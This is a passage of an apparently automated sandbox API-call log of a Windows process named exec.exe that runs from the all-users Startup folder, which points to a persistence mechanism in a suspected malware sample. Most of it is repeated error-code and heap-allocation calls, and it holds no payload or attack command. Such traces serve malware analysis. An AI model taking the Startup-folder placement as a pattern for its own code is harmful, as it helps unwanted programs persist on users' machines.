\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0123.967] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x33f59c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdf\x81\x28\x5e\xd4\xf8\x33", lpUsedDefaultChar=0x0) returned 256 [0123.967] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x83f728, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.967] SetLastError (dwErrCode=0x0) [0123.967] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.968] SetLastError (dwErrCode=0x0) [0123.968] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.969] GetLastError () returned 0x0 [0123.969] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.970] SetLastError (dwErrCode=0x0) [0123.970] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.971] SetLastError (dwErrCode=0x0) [0123.971] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.972] SetLastError (dwErrCode=0x0) [0123.972] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4e) returned 0x20f1990 [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.973] GetLastError () returned 0x0 [0123.973] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.974] SetLastError (dwErrCode=0x0) [0123.974] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.975] SetLastError (dwErrCode=0x0) [0123.975] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.976] GetLastError () returned 0x0 [0123.976] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.977] SetLastError (dwErrCode=0x0) [0123.977] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.978] SetLastError (dwErrCode=0x0) [0123.978] GetLastError () returned 0x0 [0123.979] SetLastError (dwErrCode=0x0) [0123.979] GetLastError () returned 0x0 [0123.979] SetLastError (dwErrCode=0x0) [0123.979] GetLastError () returned 0x0 [0123.979] SetLastError (dwErrCode=0x0) [0123.979] GetLastError () returned 0x0 [0123.979] SetLastError (dwErrCode=0x0) [0123.979] GetLastError () returned 0x0 [0123.979] SetLastError (dwErrCode=0x0) [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x98) returned 0x20f19e8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1f) returned 0x20f1a88 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x36) returned 0x20f1ab0 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x37) returned 0x20f1af0 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x3c) returned 0x20f1b30 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x31) returned 0x20f1b78 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x17) returned 0x20f1bb8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x24) returned 0x20f1bd8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f1c08 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0xd) returned 0x20f1c28 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x25) returned 0x20f1c40 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x39) returned 0x20f1c70 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x18) returned 0x20f1cb8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x17) returned 0x20f1cd8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0xe) returned 0x20f1cf8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x69) returned 0x20f1d10 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x3e) returned 0x20f1d88 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1b) returned 0x20f1dd0 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1d) returned 0x20f1df8 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x48) returned 0x20f1e20 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x12) returned 0x20f1e70 [0123.979] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x18) returned 0x20f1e90 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1b) returned 0x20f1eb0 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x24) returned 0x20f1ed8 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x29) returned 0x20f1f08 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1f40 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x41) returned 0x20f1f68 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x17) returned 0x20f1fb8 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0xf) returned 0x20f1fd8 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x16) returned 0x20f1ff0 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x2a) returned 0x20f2010 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x29) returned 0x20f2048 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x15) returned 0x20f2080 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f20a0 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x2a) returned 0x20f20c8 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x12) returned 0x20f2100 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x18) returned 0x20f2120 [0123.980] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x46) returned 0x20f2140 [0123.980] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f11f8 | out: hHeap=0x20f0000) returned 1 [0123.981] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0123.981] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x80) returned 0x20f11f8 [0123.982] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x838136) returned 0x0 [0123.982] RtlSizeHeap (HeapHandle=0x20f0000, Flags=0x0, MemoryPointer=0x20f11f8) returned 0x80 [0123.982] GetLastError () returned 0x0 [0123.982] SetLastError (dwErrCode=0x0) [0123.982] GetLastError () returned 0x0 [0123.982] SetLastError (dwErrCode=0x0) [0123.982] GetLastError () returned 0x0 [0123.982] SetLastError (dwErrCode=0x0) [0123.982] GetLastError () returned 0x0 [0123.982] SetLastError (dwErrCode=0x0) [0123.982] GetLastError () returned 0x0 [0123.982] SetLastError (dwErrCode=0x0) [0123.982] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.983] SetLastError (dwErrCode=0x0) [0123.983] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.984] SetLastError (dwErrCode=0x0) [0123.984] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.985] SetLastError (dwErrCode=0x0) [0123.985] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.986] GetLastError () returned 0x0 [0123.986] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.987] SetLastError (dwErrCode=0x0) [0123.987] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 